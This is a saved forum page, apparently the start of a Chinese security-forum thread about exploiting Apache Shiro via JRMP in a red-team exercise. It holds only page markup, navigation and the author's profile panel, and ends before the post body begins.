<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>某演练入口点shiro JRMP利用 - # 技术文章(Technical Article) -  [~]#棱角 ::Edge.Forum*</title>
<meta name="keywords" content="棱角安全团队(Edge Security Team)">
<meta name="description" content=" [~]#棱角 在某年某月某天某行业HVV中，又开始新的HVV的我摩拳擦掌，势要拿下一个靶标！等了好久，拿到目标和攻击队信息，当我打开主办方发来的目标xlsx，看到仅有的几个 ... - Discuz! Board">
<meta name="generator" content="Discuz! 7.2">
<meta name="author" content="Discuz! Team and Comsenz UI Team">
<meta name="copyright" content="2001-2009 Comsenz Inc.">
<meta name="MSSmartTagsPreventParsing" content="True">
<meta http-equiv="MSThemeCompatible" content="Yes">
<meta http-equiv="x-ua-compatible" content="ie=7">
<link rel="archives" title="[~]#棱角" href="http://forum.ywhack.com/archiver/">
<link rel="stylesheet" type="text/css" href="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/style_13_common.css"><link rel="stylesheet" type="text/css" href="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/scriptstyle_13_viewthread.css">
<script src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/hm.js"></script><script type="text/javascript">var STYLEID = '13', IMGDIR = 'images/default', VERHASH = 'o32', charset = 'utf-8', discuz_uid = 53, cookiedomain = '', cookiepath = '/', attackevasive = '0', disallowfloat = 'newthread|reply', creditnotice = '2|金币|,3|贡献|,4|存款|,5|EAP|,6|棱星|', gid = parseInt('27'), fid = parseInt('56'), tid = parseInt('200939')</script>
<script src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/common.js" type="text/javascript"></script>
<link rel="stylesheet" href="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/monokai-sublime.css">
<script src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/highlight.min.js" type="text/javascript" nonce="bb65ee171a"></script>
<script nonce="bb65ee171a">hljs.initHighlightingOnLoad();</script> 
<style>.crx_bdwk_down_wrap {
    top: 70%;
    left: 0;
    position: fixed;
    z-index: 99999999;
    color: #fff;
    user-select: none;
}

    .crx_bdwk_down_wrap .crx_bdwk_down_loading {
        background-color: #666;
        cursor: wait;
        width: 126px;
        text-align: center;
        padding: 16px 0;
    }

    .crx_bdwk_down_wrap .crx_bdwk_down_loading p {
            font-size: 14px;
        }

    .crx_bdwk_down_wrap .crx_bdwk_down_loading small {
            font-size: 10px;
        }

    .crx_bdwk_down_wrap .crx_bdwk_down_btn {
        width: 126px;
        height: 60px;
        display: flex;
        align-items: center;
        justify-content: center;
        cursor: pointer;
        font-size: 14px;
        background-color: #dd5a57;
        position: relative;
    }

    .crx_bdwk_down_wrap .crx_bdwk_down_types {
        display: flex;
        text-align: center;
        align-items: center;
        background-color: #666;
        font-size: 12px;
    }

    .crx_bdwk_down_wrap .crx_bdwk_down_types div {
            position: relative;
        }

    .crx_bdwk_down_wrap .crx_bdwk_down_types div:after {
                content: ' ';
                height: 12px;
                width: 1px;
                background-color: #eee;
                position: absolute;
                top: 10px;
                right: 0;
                transform: scaleX(0.5);
            }

    .crx_bdwk_down_wrap .crx_bdwk_down_types div:last-child:after {
                    display: none;
                }

    .crx_bdwk_down_wrap .crx_bdwk_down_types_check {
            flex: 1;
            color: #dd5a57;
            padding: 8px;
            cursor: pointer;
            font-weight: bold;
        }

    .crx_bdwk_down_wrap .crx_bdwk_down_types_uncheck {
            flex: 1;
            padding: 8px;
            cursor: pointer;
            color: #fff;
            font-weight: lighter;
        }
</style></head>
<body id="viewthread" onkeydown="if(event.keyCode==27) return false;">
<div id="append_parent"><div id="fastpostsmilies_menu" style="display: none;" class="smilieslist"><div id="fastpostsmiliesdiv" style="overflow: hidden;"><div class="smiliesgroup"><ul><li><a href="javascript:;" hidefocus="true" class="current" id="fastpoststype_4" onclick="smilies_switch('fastpostsmiliesdiv', '8', 4, 1, 'fastpost');if(CURRENTSTYPE) {$('fastpoststype_'+CURRENTSTYPE).className='';}this.className='current';CURRENTSTYPE=4;doane(event);">BiBi</a></li></ul></div><div id="fastpostsmiliesdiv_data"><table id="fastpostsmiliesdiv_table" cellspacing="0" cellpadding="0"><tbody><tr><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 20)" onclick="seditor_insertunit('fastpost', '{:bmg_11:}')" id="fastpostsmilie_90_td"><img id="smilie_90" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/11.gif" alt="{:bmg_11:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_22:}')" id="fastpostsmilie_103_td"><img id="smilie_103" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/22.gif" alt="{:bmg_22:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_20:}')" id="fastpostsmilie_104_td"><img id="smilie_104" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/20.gif" alt="{:bmg_20:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_02:}')" id="fastpostsmilie_105_td"><img id="smilie_105" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/02.gif" alt="{:bmg_02:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_14:}')" id="fastpostsmilie_106_td"><img id="smilie_106" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/14.gif" alt="{:bmg_14:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_18:}')" id="fastpostsmilie_107_td"><img id="smilie_107" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/18.gif" alt="{:bmg_18:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_01:}')" id="fastpostsmilie_108_td"><img id="smilie_108" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/01.gif" alt="{:bmg_01:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_16:}')" id="fastpostsmilie_109_td"><img id="smilie_109" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/16.gif" alt="{:bmg_16:}" width="20" height="20"></td></tr><tr><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_08:}')" id="fastpostsmilie_110_td"><img id="smilie_110" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/08.gif" alt="{:bmg_08:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_17:}')" id="fastpostsmilie_111_td"><img id="smilie_111" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/17.gif" alt="{:bmg_17:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_12:}')" id="fastpostsmilie_102_td"><img id="smilie_102" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/12.gif" alt="{:bmg_12:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_21:}')" id="fastpostsmilie_101_td"><img id="smilie_101" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/21.gif" alt="{:bmg_21:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_03:}')" id="fastpostsmilie_100_td"><img id="smilie_100" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/03.gif" alt="{:bmg_03:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_10:}')" id="fastpostsmilie_91_td"><img id="smilie_91" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/10.gif" alt="{:bmg_10:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_19:}')" id="fastpostsmilie_92_td"><img id="smilie_92" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/19.gif" alt="{:bmg_19:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 20)" onclick="seditor_insertunit('fastpost', '{:bmg_23:}')" id="fastpostsmilie_93_td"><img id="smilie_93" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/23.gif" alt="{:bmg_23:}" width="20" height="20"></td></tr><tr><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_15:}')" id="fastpostsmilie_94_td"><img id="smilie_94" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/15.gif" alt="{:bmg_15:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_07:}')" id="fastpostsmilie_95_td"><img id="smilie_95" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/07.gif" alt="{:bmg_07:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_04:}')" id="fastpostsmilie_96_td"><img id="smilie_96" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/04.gif" alt="{:bmg_04:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_13:}')" id="fastpostsmilie_97_td"><img id="smilie_97" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/13.gif" alt="{:bmg_13:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_05:}')" id="fastpostsmilie_98_td"><img id="smilie_98" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/05.gif" alt="{:bmg_05:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_09:}')" id="fastpostsmilie_99_td"><img id="smilie_99" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/09.gif" alt="{:bmg_09:}" width="20" height="20"></td><td onmouseover="smilies_preview('fastpost', 'fastpostsmiliesdiv', this, 21)" onclick="seditor_insertunit('fastpost', '{:bmg_06:}')" id="fastpostsmilie_112_td"><img id="smilie_112" src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/06.gif" alt="{:bmg_06:}" width="20" height="20"></td></tr></tbody></table></div><div class="smilieslist_page" id="fastpostsmiliesdiv_page"></div></div></div></div><div id="ajaxwaitid"></div>
<div id="header">
<div class="wrap s_clear">
<h2><a href="https://forum.ywhack.com/index.php" title="[~]#棱角"><img src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/logo.svg" alt="[~]#棱角" border="0"></a></h2>
<div id="umenu">
<cite><a href="https://forum.ywhack.com/space-uid-53.html" class="noborder">bugkidz</a><span id="loginstatus"><a href="https://forum.ywhack.com/member.php?action=switchstatus" onclick="ajaxget(this.href, 'loginstatus');doane(event);">隐身</a></span></cite>
<span class="pipe">|</span>
<a id="myprompt" href="https://forum.ywhack.com/notice.php?myuid=53">提醒</a>
<span id="myprompt_check"></span>
<a href="https://forum.ywhack.com/pm.php?myuid=53" id="pm_ntc" target="_blank">短消息</a>
<span class="pipe">|</span>
<a href="https://forum.ywhack.com/memcp.php?myuid=53">个人中心</a>
<a href="https://forum.ywhack.com/logging.php?action=logout&amp;formhash=6bff928a">退出</a>
</div>
<div id="ad_headerbanner"></div>
<div id="menu">
<ul>
<li class="current"><a href="https://forum.ywhack.com/index.php" hidefocus="true" id="mn_index">论坛</a></li><li class="menu_2"><a href="https://forum.ywhack.com/search.php" hidefocus="true" id="mn_search">搜索</a></li><li class="menu_8"><a href="https://forum.ywhack.com/plugin.php?id=bank:bank" hidefocus="true" id="mn_plugin_1">银行</a></li><li class="menu_19"><a href="https://forum.ywhack.com/contributors.php" hidefocus="true" id="mn_contributors">贡献榜</a></li><li class="menu_9" id="CmmKLM" onmouseover="showMenu({'ctrlid':this.id})"><a href="#" hidefocus="true" class="dropmenu" style="font-weight: bold;">工具</a></li><li class="menu_16"><a href="https://forum.ywhack.com/report.php" hidefocus="true" id="mn_report">周报</a></li><li class="menu_4"><a href="https://forum.ywhack.com/faq.php" hidefocus="true" id="mn_faq">帮助</a></li><li class="menu_5"><a href="https://forum.ywhack.com/misc.php?action=nav" hidefocus="true" onclick="showWindow('nav', this.href);return false;">导航</a></li></ul>
<script type="text/javascript">
var currentMenu = $('mn_') ? $('mn_') : $('mn_index');
currentMenu.parentNode.className = 'current';
</script>
</div>
</div>
<div id="myprompt_menu" style="display:none" class="promptmenu">
<div class="promptcontent">
<ul class="s_clear"><li style="display:none"><a id="prompt_pm" href="https://forum.ywhack.com/pm.php?filter=newpm" target="_blank">私人消息 (0)</a></li><li style="display:none"><a id="prompt_announcepm" href="https://forum.ywhack.com/pm.php?filter=announcepm" target="_blank">公共消息 (0)</a></li><li style="display:none"><a id="prompt_systempm" href="https://forum.ywhack.com/notice.php?filter=systempm" target="_blank">系统消息 (0)</a></li><li style="display:none"><a id="prompt_friend" href="https://forum.ywhack.com/notice.php?filter=friend" target="_blank">好友消息 (0)</a></li><li style="display:none"><a id="prompt_threads" href="https://forum.ywhack.com/notice.php?filter=threads" target="_blank">帖子消息 (0)</a></li></ul>
</div>
</div>
</div>

<script src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/viewthread.js" type="text/javascript"></script>
<script type="text/javascript">zoomstatus = parseInt(1);var imagemaxwidth = '%600';var aimgcount = new Array();</script>

<div id="nav">
<a href="https://forum.ywhack.com/index.php">[~]#棱角</a> » <a href="https://forum.ywhack.com/forum-56-7.html"># 技术文章(Technical Article)</a> » 某演练入口点shiro JRMP利用</div>


<div id="ad_text"></div>
<div id="wrap" class="wrap s_clear threadfix">
<div class="forumcontrol">
<table cellspacing="0" cellpadding="0">
<tbody><tr>
<td class="modaction">
</td>
<td>
<span class="pageback" id="visitedforums" onmouseover="$('visitedforums').id = 'visitedforumstmp';this.id = 'visitedforums';showMenu({'ctrlid':this.id})"><a href="https://forum.ywhack.com/forum-56-7.html">返回列表</a></span>
<span class="replybtn" id="post_reply" prompt="post_reply"><a href="https://forum.ywhack.com/post.php?action=reply&amp;fid=56&amp;tid=200939" onclick="showWindow('reply', this.href);return false;">回复</a></span>
<span class="postbtn" id="newspecial" prompt="post_newthread" onmouseover="$('newspecial').id = 'newspecialtmp';this.id = 'newspecial';showMenu({'ctrlid':this.id})"><a href="https://forum.ywhack.com/post.php?action=newthread&amp;fid=56" onclick="showWindow('newthread', this.href);return false;">发帖</a></span>
</td>
</tr>
</tbody></table>
</div>


<div id="postlist" class="mainbox viewthread"><div id="post_202821"><table id="pid202821" summary="pid202821" cellspacing="0" cellpadding="0">
        <tbody><tr>
        <td class="postauthor" rowspan="2">
                                    <div class="postinfo">
                <a target="_blank" href="https://forum.ywhack.com/space.php?uid=149" style="margin-left: 20px; font-weight: 800">dreamland</a>
            </div>
                        <div class="popupmenu_popup userinfopanel" id="userinfo202821" style="display: none; position: absolute;margin-top: -11px;">
                <div class="popavatar">
                    <div id="userinfo202821_ma"></div>
                    <ul class="profile_side">
                        <li class="pm"><a href="https://forum.ywhack.com/pm.php?action=new&amp;uid=149" onclick="hideMenu('userinfo202821');showWindow('sendpm', this.href);return false;" title="发短消息">发短消息</a></li>
                                                <li class="buddy"><a href="https://forum.ywhack.com/my.php?item=buddylist&amp;newbuddyid=149&amp;buddysubmit=yes" target="_blank" id="ajax_buddy_0" title="加为好友" onclick="ajaxmenu(this, 3000);doane(event);">加为好友</a></li>
                    </ul>
                                    </div>
                <div class="popuserinfo">
                    <p>
                        <a href="https://forum.ywhack.com/space-uid-149.html" target="_blank">dreamland</a>
                                                                                                <em>当前在线
</em>
                                            </p>
                                        <dl class="s_clear"><dt>UID</dt><dd>149&nbsp;</dd><dt>帖子</dt><dd>39&nbsp;</dd><dt>精华</dt><dd>0&nbsp;</dd><dt>积分</dt><dd>55&nbsp;</dd><dt>金币</dt><dd>3 &nbsp;</dd><dt>贡献</dt><dd>20 &nbsp;</dd><dt>存款</dt><dd>0 &nbsp;</dd><dt>EAP</dt><dd>46 &nbsp;</dd><dt>棱星</dt><dd>8 &nbsp;</dd><dt>阅读权限</dt><dd>10&nbsp;</dd><dt>在线时间</dt><dd>68 小时&nbsp;</dd><dt>注册时间</dt><dd>2022-3-1&nbsp;</dd><dt>最后登录</dt><dd>2023-4-23&nbsp;</dd></dl>
                    <div class="imicons">
                                                                        
                                                                        
                        <a href="https://forum.ywhack.com/space-uid-149.html" target="_blank" title="查看详细资料"><img src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/userinfo.gif" alt="查看详细资料"></a>
                                            </div>
                    <div id="avatarfeed"><span id="threadsortswait"></span></div>
                </div>
            </div>
                         <a name="lastpost"></a>                        <div>
                                <div class="avatar" onmouseover="showauthor(this, 'userinfo202821')"><a href="https://forum.ywhack.com/space-uid-149.html" target="_blank"><img src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/noavatar_middle.gif" onerror="this.onerror=null;this.src='https://forum.ywhack.com/ucedge_server/images/noavatar_middle.gif'"></a></div>

                                <p><em><a href="https://forum.ywhack.com/faq.php?action=grouppermission&amp;searchgroupid=10" target="_blank">新手上路</a></em></p>
            </div>
            <p><img src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/star_level1.gif" alt="Rank: 1"></p>
                                    <dl class="profile s_clear"><dt>帖子</dt><dd>39&nbsp;</dd><dt>积分</dt><dd>55&nbsp;</dd><dt>金币</dt><dd>3 &nbsp;</dd><dt>贡献</dt><dd>20 &nbsp;</dd><dt>EAP</dt><dd>46 &nbsp;</dd><dt>坛龄</dt><dd>418天&nbsp;</dd></dl>
                                                                        <p><style type="text/css">.edge4-certification{background:#6f22a0;color:#FFF;font-size:12px;display:inline-block;width:120px;height:24px;line-height:24px;text-align:center;border-radius:2px;vertical-align:middle;cursor:pointer;opacity:.85;}.edge4-certification:hover{opacity:1;}</style>
<a href="https://forum.ywhack.com/thread-200930-1-1.html" target="_blank"><span class="edge4-certification" alt="棱星奖励计划,获得棱星打赏 &gt; 1 可获取." title="棱星奖励计划,获得棱星打赏 &gt; 1 可获取.">获得 8 棱星<img src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/edge_4-certification.png" style="margin-left:2px;vertical-align: middle;padding-bottom: 2px" width="13px"></span></a></p>
                                                <p>
                                <a href="https://forum.ywhack.com/magic.php?action=mybox&amp;operation=use&amp;type=1&amp;pid=202821&amp;magicid=7" onclick="showWindow('magics', this.href);doane(event);"><img src="%E6%9F%90%E6%BC%94%E7%BB%83%E5%85%A5%E5%8F%A3%E7%82%B9shiro%20JRMP%E5%88%A9%E7%94%A8%20-%20%23%20%E6%8A%80%E6%9C%AF%E6%96%87%E7%AB%A0(Technical%20Article)%20-%20[~]%23%E6%A3%B1%E8%A7%92%20Edge.Forum%20_files/rtk_s.gif" title="对dreamland使用狗仔卡"></a>
                            </p>
                                                        </td>
        <td class="postcontent">
                        <div id="threadstamp">
                            </div>
                        <div class="postinfo">
